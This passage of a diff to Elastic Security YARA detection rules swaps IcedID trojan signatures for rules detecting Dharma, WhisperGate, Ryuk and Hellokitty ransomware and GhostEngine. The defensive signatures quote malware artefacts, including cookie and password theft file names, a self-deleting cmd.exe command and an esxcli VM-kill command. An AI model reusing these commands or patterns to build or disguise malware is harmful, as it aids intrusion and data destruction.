"25d23d045c57758dbb14092cff3cc190755ceb3a21c8a80505bd316a430e21fc" + threat_name = "Windows.Ransomware.Dharma" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -56926,28 +57834,30 @@ rule ELASTIC_Windows_Trojan_Icedid_F1Ce2F0A : FILE MEMORY os = "windows" strings: - $a = { 8B C8 8B C6 F7 E2 03 CA 8B 54 24 14 2B D0 8B 44 24 14 89 54 } + $b1 = "sssssbsss" ascii fullword + $b2 = "sssssbs" ascii fullword + $b3 = "RSDS%~m" ascii fullword condition: - all of them + 3 of ($b*) } -rule ELASTIC_Windows_Trojan_Icedid_08530E24 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Dharma_E9319E4A : BETA FILE MEMORY { meta: - description = "Detects Windows Trojan Icedid (Windows.Trojan.IcedID)" + description = "Identifies DHARMA ransomware" author = "Elastic Security" - id = "08530e24-5b84-40a4-bc5c-ead74762faf8" - date = "2021-03-21" + id = "e9319e4a-3850-4bad-9579-4b73199a0963" + date = "2020-06-25" modified = "2021-08-23" - reference = "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_IcedID.yar#L67-L99" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "31db92c7920e82e49a968220480e9f130dea9b386083b78a79985b554ecdc6e4" - logic_hash = "a63511edde9d873e184ddb4720b4752b0e7df4bdb2114b05c16f2ca0594eb6b8" + reference = "https://blog.malwarebytes.com/threat-analysis/2019/05/threat-spotlight-crysis-aka-dharma-ransomware-causing-a-crisis-for-businesses/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Dharma.yar#L46-L65" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "182ed508d645a0b1fab80fb6f975a05d33b64c43005bd3656df6470934cd71f4" score = 75 - quality = 50 - tags = "FILE, MEMORY" - fingerprint = "f2b5768b87eec7c1c9730cc99364cc90e87fd9201bf374418ad008fd70d321af" + quality = 75 + tags = "BETA, FILE, MEMORY" + fingerprint = "4a4f3aebe4c9726cf62dde454f01cbf6dcb09bf3ef1b230d548fe255f01254aa" + threat_name = "Windows.Ransomware.Dharma" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -56955,41 +57865,28 @@ rule ELASTIC_Windows_Trojan_Icedid_08530E24 : FILE MEMORY os = "windows" strings: - $a1 = "c:\\ProgramData\\" ascii fullword - $a2 = "loader_dll_64.dll" ascii fullword - $a3 = "aws.amazon.com" wide fullword - $a4 = "Cookie: __gads=" wide fullword - $b1 = "LookupAccountNameW" ascii fullword - $b2 = "GetUserNameA" ascii fullword - $b3 = "; _gat=" wide fullword - $b4 = "; _ga=" wide fullword - $b5 = "; _u=" wide fullword - $b6 = "; __io=" wide fullword - $b7 = "; _gid=" wide fullword - $b8 = "%s%u" wide fullword - $b9 = "i\\|9*" ascii fullword - $b10 = "WinHttpSetStatusCallback" ascii fullword + $d = { 08 8B 51 24 8B 45 08 8B 48 18 0F B7 14 51 85 D2 74 47 8B 45 08 8B } condition: - all of ($a*) and 5 of ($b*) + 1 of ($d*) } -rule ELASTIC_Windows_Trojan_Icedid_11D24D35 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Dharma_942142E3 : BETA FILE MEMORY { meta: - description = "Detects Windows Trojan Icedid (Windows.Trojan.IcedID)" + description = "Identifies DHARMA ransomware" author = "Elastic Security" - id = "11d24d35-6bff-4fac-83d8-4d152aa0be57" - date = "2022-02-16" - modified = "2022-04-06" - reference = "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_IcedID.yar#L101-L121" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982" - logic_hash = "4a5d0f37e3e80e370ae79fd45256dbd274ed8f8bcd021e8d6f95a0bc0bc5321f" + id = "942142e3-9197-41c4-86cc-66121c8a9ab5" + date = "2020-06-25" + modified = "2021-08-23" + reference = "https://blog.malwarebytes.com/threat-analysis/2019/05/threat-spotlight-crysis-aka-dharma-ransomware-causing-a-crisis-for-businesses/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Dharma.yar#L67-L86" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "af5068ef3442964e4d1c5e27090fb84eaf762ff23463b7a0c2902e523ae601c1" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e" + tags = "BETA, FILE, MEMORY" + fingerprint = "e8ee60d53f92dd1ade8cc956c13a5de38f9be9050131ba727f2fab41dde619a8" + threat_name = "Windows.Ransomware.Dharma" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -56997,29 +57894,28 @@ rule ELASTIC_Windows_Trojan_Icedid_11D24D35 : FILE MEMORY os = "windows" strings: - $a1 = "C:\\Users\\user\\source\\repos\\anubis\\bin\\RELEASE\\loader_dll_64.pdb" ascii fullword - $a2 = "loader_dll_64.dll" ascii fullword + $a1 = "C:\\crysis\\Release\\PDB\\payload.pdb" ascii fullword condition: 1 of ($a*) } -rule ELASTIC_Windows_Trojan_Icedid_0B62E783 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Whispergate_C80F3B4B : FILE MEMORY { meta: - description = "Detects Windows Trojan Icedid (Windows.Trojan.IcedID)" + description = "Detects Windows Ransomware Whispergate (Windows.Ransomware.WhisperGate)" author = "Elastic Security" - id = "0b62e783-5c1a-4377-8338-1c53194b8d01" - date = "2022-04-06" - modified = "2022-06-09" - reference = "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_IcedID.yar#L123-L142" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a" - logic_hash = "aca126529dfa8047ed7dfdc60d970759ab5307448d7d764f88e402cd8d2a016f" + id = "c80f3b4b-f91b-4b8d-908e-f64c2c5d4b30" + date = "2022-01-17" + modified = "2022-01-17" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_WhisperGate.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92" + logic_hash = "04452141a867d4f6fce618c21795cc142a1265b56c62ecb9e579003d36b4b2b9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a" + fingerprint = "e8ad6a7cfabf96387deee56f38b0f0ba6d8fe85e7be9f153ccf72d69ee5db1c9" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57027,28 +57923,29 @@ rule ELASTIC_Windows_Trojan_Icedid_0B62E783 : FILE MEMORY os = "windows" strings: - $a = { 89 44 95 E0 83 E0 07 8A C8 42 8B 44 85 E0 D3 C8 FF C0 42 89 44 } + $buffer = { E8 ?? ?? ?? ?? BE 20 40 40 00 29 C4 8D BD E8 DF FF FF E8 ?? ?? ?? ?? B9 00 08 00 00 F3 A5 } + $note = { 59 6F 75 72 20 68 61 72 64 20 64 72 69 76 65 20 68 61 73 20 62 65 65 6E 20 63 6F 72 72 75 70 74 65 64 2E 0D 0A } condition: all of them } -rule ELASTIC_Windows_Trojan_Icedid_91562D18 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Whispergate_3476008E : FILE MEMORY { meta: - description = "Detects Windows Trojan Icedid (Windows.Trojan.IcedID)" + description = "Detects Windows Ransomware Whispergate (Windows.Ransomware.WhisperGate)" author = "Elastic Security" - id = "91562d18-28a1-4349-9e4b-92ad165510c9" - date = "2022-04-06" - modified = "2022-06-09" - reference = "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_IcedID.yar#L144-L163" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a" - logic_hash = "81c87d0d6726bc2dde42fe93c77af53cdd29bb6437fe3d47d1b4550140722c88" + id = "3476008e-1c98-4606-b60b-7fef0e360711" + date = "2022-01-18" + modified = "2022-01-18" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_WhisperGate.yar#L22-L43" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d" + logic_hash = "729818df1b6b82fc00eba0fe1c9139ec4746e1775146ab7fdea9e25dec1cddea" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022" + fingerprint = "0b8caff8cf9342bd50053712bf4c9aeab68532e340cc5e6cf400105afc150e39" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57056,57 +57953,62 @@ rule ELASTIC_Windows_Trojan_Icedid_91562D18 : FILE MEMORY os = "windows" strings: - $a = { 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41 } + $a1 = "cmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 > Nul & Del /f /q \"%s\"" ascii fullword + $a2 = "%.*s.%x" wide fullword + $a3 = "A:\\Windows" wide fullword + $a4 = ".ONETOC2" wide fullword condition: all of them } -rule ELASTIC_Windows_Trojan_Icedid_2086Aecb : FILE MEMORY +rule ELASTIC_Linux_Ransomware_Hellokitty_35731270 : FILE MEMORY { meta: - description = "Detects Windows Trojan Icedid (Windows.Trojan.IcedID)" + description = "Detects Linux Ransomware Hellokitty (Linux.Ransomware.Hellokitty)" author = "Elastic Security" - id = "2086aecb-161b-4102-89c7-580fb9ac3759" - date = "2022-04-06" - modified = "2022-03-02" - reference = "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_IcedID.yar#L165-L184" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a" - logic_hash = "561bf7eacfbbf1b4e0c111347f0d6ff4325bdbce8db73bee1ba836b610569c0d" + id = "35731270-b283-4dff-8316-6a541ff1d4d5" + date = "2023-07-27" + modified = "2024-02-13" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_Hellokitty.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "556e5cb5e4e77678110961c8d9260a726a363e00bf8d278e5302cb4bfccc3eed" + logic_hash = "40cb632d6b8561de56f2010a082a24b0c50d4cabed21e073168b5302ddff7044" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a8b6cbb3140ff3e1105bb32a2da67831917caccc4985c485bbfdb0aa50016d86" + fingerprint = "1945bfcbe084f8f6671c73e74679fb2933d2ebea54479fdf348d4804a614279a" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 4C 8D 05 [4] 42 8A 44 01 ?? 42 32 04 01 88 44 0D ?? 48 FF C1 48 83 F9 20 72 ?? } + $a1 = "File Locked:%s PID:%d" fullword + $a2 = "error encrypt: %s rename back:%s" fullword + $a3 = "esxcli vm process kill -t=soft -w=%d" fullword condition: - all of them + 2 of them } -rule ELASTIC_Windows_Trojan_Icedid_48029E37 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Ghostengine_8Ea2Aa65 : FILE MEMORY { meta: - description = "Detects Windows Trojan Icedid (Windows.Trojan.IcedID)" + description = "Detects Windows Trojan Ghostengine (Windows.Trojan.GhostEngine)" author = "Elastic Security" - id = "48029e37-b392-4d53-b0de-2079f6a8a9d9" - date = "2022-04-06" - modified = "2022-06-09" - reference = "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_IcedID.yar#L186-L205" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a" - logic_hash = "1fe337d7a0607938aaf57cf25c1373aadf315b7a8cec133d6d30a38bd58e1027" + id = "8ea2aa65-d7e2-4c58-9f95-3194cd8b6990" + date = "2024-05-07" + modified = "2024-05-13" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_GhostEngine.yar#L1-L26" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2fe78941d74d35f721556697491a438bf3573094d7ac091b42e4f59ecbd25753" + logic_hash = "3bddd2ac79d92d34df5d2df4a11cf96cc44ca39c3baece1b5c67b75a682778ff" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e" + fingerprint = "17c4c2fa2d412b79ee197de1e6bd6a4c882ad894be54a780e540627a570756e5" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57114,29 +58016,35 @@ rule ELASTIC_Windows_Trojan_Icedid_48029E37 : FILE MEMORY os = "windows" strings: - $a = { 48 C1 E3 10 0F 31 48 C1 E2 ?? 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1 } + $str0 = "\\\\.\\IOBitUnlockerDevice" + $str1 = "C:\\Windows\\Fonts\\taskhostw.exe" + $str2 = "C:\\Windows\\Fonts\\config.json" + $str3 = "/drives/kill.png" + $str4 = "C:\\Windows\\Fonts\\WinRing0x64.sys" + $str5 = "C:\\Windows\\Fonts\\smartsscreen.exe" + $binary0 = { 89 C2 C1 E8 1F C1 E0 1F 85 C0 0F 84 74 01 00 00 D1 E2 89 CB C1 E9 1F 09 D1 D1 E3 C1 EB 1F 89 CA D1 E1 09 D9 89 CB 81 C1 80 7F B1 D7 C1 EA 1F 81 C3 80 7F B1 D7 83 D2 0D 81 C1 00 09 6E 88 89 4C 24 20 83 D2 F1 89 54 24 24 } + $binary1 = { 83 F9 06 0F ?? ?? ?? ?? ?? 8B 10 81 FA 78 38 36 5F 0F 85 ?? ?? ?? ?? 0F B7 50 04 66 81 FA 36 34 74 ?? E9 ?? ?? 00 00 C7 04 24 00 E4 0B 54 C7 44 24 04 02 00 00 00 } condition: - all of them + 3 of ($str*) or 1 of ($binary*) } -rule ELASTIC_Windows_Trojan_Icedid_56459277 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Ryuk_25D3C5Ba : BETA FILE MEMORY { meta: - description = "IcedID Gzip Variant Core" + description = "Identifies RYUK ransomware" author = "Elastic Security" - id = "56459277-432c-437c-9350-f5efaa60ffca" - date = "2022-08-21" - modified = "2023-03-02" - reference = "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_IcedID.yar#L207-L237" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "21b1a635db2723266af4b46539f67253171399830102167c607c6dbf83d6d41c" - logic_hash = "a18557217c69a3bb8c3da7725d2e0ed849741f8e36341a4ea80eea09d47a5b45" + id = "25d3c5ba-8f80-4af0-8a5d-29c974fb016a" + date = "2020-04-30" + modified = "2021-08-23" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Ryuk.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "4d461ff9b87e3a17637cef89ff8a85ef22f69695d4664f6fe8f271a6a5f7b4bc" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "503bfa6800e0f4ff1a0b56eb8a145e67fa0f387c84aee7bd2eca3cf7074be709" - threat_name = "Windows.Trojan.IcedID" + tags = "BETA, FILE, MEMORY" + fingerprint = "18e70599e3a187e77697844fa358dd150e7e25ac74060e8c7cf2707fb7304efd" + threat_name = "Windows.Ransomware.Ryuk" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57144,39 +58052,28 @@ rule ELASTIC_Windows_Trojan_Icedid_56459277 : FILE MEMORY os = "windows" strings: - $str1 = "cookie.tar" ascii fullword - $str2 = "passff.tar" ascii fullword - $str3 = "\\sqlite64.dll" ascii fullword - $str4 = "Cookie: session=" ascii fullword - $str5 = "{0ccac395-7d1d-4641-913a-7558812ddea2}" ascii fullword - $str6 = "mail_vault" wide fullword - $seq_decrypt_payload = { 42 0F B6 04 32 48 FF C2 03 C8 C1 C1 ?? 48 3B D7 72 ?? 44 33 F9 45 33 C9 44 89 3C 3B 48 85 FF 74 ?? 41 0F B6 D1 44 8D 42 01 83 E2 03 41 83 E0 03 } - $seq_compute_hash = { 0F B6 4C 14 ?? 48 FF C2 8B C1 83 E1 ?? 48 C1 E8 ?? 41 0F B7 04 41 66 89 03 48 8D 5B ?? 41 0F B7 0C 49 66 89 4B ?? 48 83 FA ?? 72 ?? 66 44 89 03 B8 } - $seq_format_string = { C1 E8 ?? 44 0B D8 41 0F B6 D0 8B C1 C1 E2 ?? C1 E1 ?? 25 [4] 0B C1 41 C1 E8 ?? 41 0F B6 CA 41 0B D0 44 8B 44 24 ?? C1 E0 ?? C1 E1 ?? 41 C1 EB ?? 44 0B D8 41 C1 EA ?? 0F B7 44 24 ?? 41 0B CA } - $seq_custom_ror = { 41 8A C0 41 8A D0 02 C0 0F B6 C8 8A C1 44 8B C1 34 ?? 84 D2 0F B6 C8 44 0F 48 C1 49 83 EB } - $seq_string_decrypt = { 0F B7 44 24 ?? 0F B7 4C 24 ?? 3B C1 7D ?? 8B 4C 24 ?? E8 [4] 89 44 24 ?? 0F B7 44 24 ?? 48 8B 4C 24 ?? 0F B6 04 01 0F B6 4C 24 ?? 33 C1 0F B7 4C 24 ?? 48 8B 54 24 ?? 88 04 0A EB } + $g1 = { 41 8B C0 45 03 C7 99 F7 FE 48 63 C2 8A 4C 84 20 } condition: - 5 of ($str*) or 2 of ($seq_*) + 1 of ($g*) } -rule ELASTIC_Windows_Trojan_Icedid_7C1619E3 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Ryuk_878Bae7E : BETA FILE MEMORY { meta: - description = "IcedID Injector Variant Loader " + description = "Identifies RYUK ransomware" author = "Elastic Security" - id = "7c1619e3-f94a-4a46-8a81-d5dd7a58c754" - date = "2022-12-20" - modified = "2023-02-01" - reference = "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_IcedID.yar#L239-L261" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4f6de748628b8b06eeef3a5fabfe486bfd7aaa92f50dc5a8a8c70ec038cd33b1" - logic_hash = "24ddaf474dabc5e91cce08734a035feced9048a3faac4ff236bc97e6caabd642" + id = "878bae7e-1e53-4648-93aa-b4075eef256d" + date = "2020-04-30" + modified = "2021-08-23" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Ryuk.yar#L22-L42" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "94bed2220aeb41ae8069cee56cc5299b9fc56797d3b54085b8246a03d9e8bd93" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "ae21deaad74efaff5bec8c9010dc340118ac4c79e3bec190a7d3c3672a5a8583" - threat_name = "Windows.Trojan.IcedID" + tags = "BETA, FILE, MEMORY" + fingerprint = "93a501463bb2320a9ab824d70333da2b6f635eb5958d6f8de43fde3a21de2298" + threat_name = "Windows.Ransomware.Ryuk" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57184,31 +58081,29 @@ rule ELASTIC_Windows_Trojan_Icedid_7C1619E3 : FILE MEMORY os = "windows" strings: - $a1 = { C1 C9 0D 0F BE C0 03 C8 46 8A 06 84 C0 75 ?? 8B 74 24 ?? 81 F1 [4] 39 16 76 } - $a2 = { D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 } - $a3 = { 8B 4E ?? FF 74 0B ?? 8B 44 0B ?? 03 C1 50 8B 44 0B ?? 03 46 ?? 50 E8 [4] 8B 46 ?? 8D 5B ?? 83 C4 0C 47 3B 78 } + $b2 = "RyukReadMe.html" wide fullword + $b3 = "RyukReadMe.txt" wide fullword condition: - all of them + 1 of ($b*) } -rule ELASTIC_Windows_Trojan_Icedid_D8B23Cd6 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Ryuk_6C726744 : BETA FILE MEMORY { meta: - description = "IcedID VNC server" + description = "Identifies RYUK ransomware" author = "Elastic Security" - id = "d8b23cd6-c20c-40c9-a8e9-80d68e709764" - date = "2023-01-03" - modified = "2023-01-03" - reference = "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_IcedID.yar#L263-L294" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bd4da2f84c29437bc7efe9599a3a41f574105d449ac0d9b270faaca8795153ab" - logic_hash = "47e427a4f088de523115f438cad9fc26233158b0518d87703c282df351110762" + id = "6c726744-acdb-443a-b683-b11f8b657f7a" + date = "2020-04-30" + modified = "2021-08-23" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Ryuk.yar#L44-L67" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "ee7586d5cbef23d1863a4dfcc5da9b97397c993268881922c681022bf4f293f0" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "d47af2b50d0fb07858538fdb9f53fee008b49c9b1d015e4593199407673e0e21" - threat_name = "Windows.Trojan.IcedID" + tags = "BETA, FILE, MEMORY" + fingerprint = "d0a4608907e48d02d78ff40a59d47cad1b9258df31b7312dd1a85f8fee2a28d5" + threat_name = "Windows.Ransomware.Ryuk" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57216,39 +58111,32 @@ rule ELASTIC_Windows_Trojan_Icedid_D8B23Cd6 : FILE MEMORY os = "windows" strings: - $a1 = "User idle %u sec / Locked: %s / ScreenSaver: %s" wide - $a2 = "No VNC HOOK" wide - $a3 = "Webcam %u" wide - $a4 = "rundll32.exe shell32.dll,#61" - $a5 = "LAP WND" - $a6 = "FG WND" - $a7 = "CAP WND" - $a8 = "HDESK Tmp" wide - $a9 = "HDESK Bot" wide - $a10 = "HDESK bot" wide - $a11 = "CURSOR: %u, %u" - $b1 = { 83 7C 24 ?? 00 75 ?? 83 7C 24 ?? 00 75 ?? [1] 8B 0D [4] 8B 44 24 } + $a1 = "172.16." ascii fullword + $a2 = "192.168." ascii fullword + $a3 = "DEL /F" wide fullword + $a4 = "lsaas.exe" wide fullword + $a5 = "delete[]" ascii fullword condition: - 6 of them + 4 of ($a*) } -rule ELASTIC_Windows_Trojan_Icedid_A2Ca5F80 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Ryuk_1A4Ad952 : BETA FILE MEMORY { meta: - description = "IcedID Injector Variant Core" + description = "Identifies RYUK ransomware" author = "Elastic Security" - id = "a2ca5f80-85b1-4502-8794-b8b4ea1be482" - date = "2023-01-16" - modified = "2023-04-23" - reference = "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_IcedID.yar#L296-L323" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "e36266cd66b9542f2eb9d38f9a01f7b480f2bcdbe61fe20944dca33e22bd3281" + id = "1a4ad952-cc99-4653-932b-290381e7c871" + date = "2020-04-30" + modified = "2021-08-23" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Ryuk.yar#L69-L88" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "bb854f5760f41e2c103c99d8f128a2546926a614dff8753eaa1287ac583e213a" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "dfbacf63b91315e5acf168b57bf18283ba30f681f5b3d3835418d0d32d238854" - threat_name = "Windows.Trojan.Icedid" + tags = "BETA, FILE, MEMORY" + fingerprint = "d8c5162850e758e27439e808e914df63f42756c0b8f7c2b5f9346c0731d3960c" + threat_name = "Windows.Ransomware.Ryuk" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57256,37 +58144,28 @@ rule ELASTIC_Windows_Trojan_Icedid_A2Ca5F80 : FILE MEMORY os = "windows" strings: - $a1 = "EMPTY" - $a2 = "CLEAR" - $a3 = { 66 C7 06 6D 3D 83 C6 02 0F B6 05 [4] 50 68 34 73 00 10 56 FF D7 03 F0 66 C7 06 26 6A C6 46 ?? 3D 83 C6 03 } - $a4 = { 8B 46 ?? 6A 00 FF 76 ?? F7 D8 FF 76 ?? 1B C0 FF 76 ?? 50 FF 76 ?? 53 FF 15 } - $a5 = { 8D 44 24 ?? 89 7C 24 ?? 89 44 24 ?? 33 F6 B8 BB 01 00 00 46 55 66 89 44 24 ?? 89 74 24 ?? E8 [4] 89 44 24 ?? 85 C0 74 ?? 8B AC 24 } - $a6 = { 8A 01 88 45 ?? 45 41 83 EE 01 75 ?? 8B B4 24 [4] 8B 7E } - $a7 = { 53 E8 [4] 8B D8 30 1C 2F 45 59 3B EE 72 } - $a8 = { 8B 1D [4] 33 D9 6A 00 53 52 E8 [4] 83 C4 0C 89 44 24 ?? 85 C0 0F 84 } - $a9 = { C1 C9 0D 0F BE C0 03 C8 46 8A 06 } + $e1 = { 8B 0A 41 8D 45 01 45 03 C1 48 8D 52 08 41 3B C9 41 0F 45 C5 44 8B E8 49 63 C0 48 3B C3 72 E1 } condition: - 4 of them + 1 of ($e*) } -rule ELASTIC_Windows_Trojan_Icedid_B8C59889 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Ryuk_72B5Fd9D : BETA FILE MEMORY { meta: - description = "IcedID fork init loader" + description = "Identifies RYUK ransomware" author = "Elastic Security" - id = "b8c59889-2cc6-49c6-a81a-4bc36f3b1f6f" - date = "2023-05-05" - modified = "2023-06-13" - reference = "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary" - source_url = 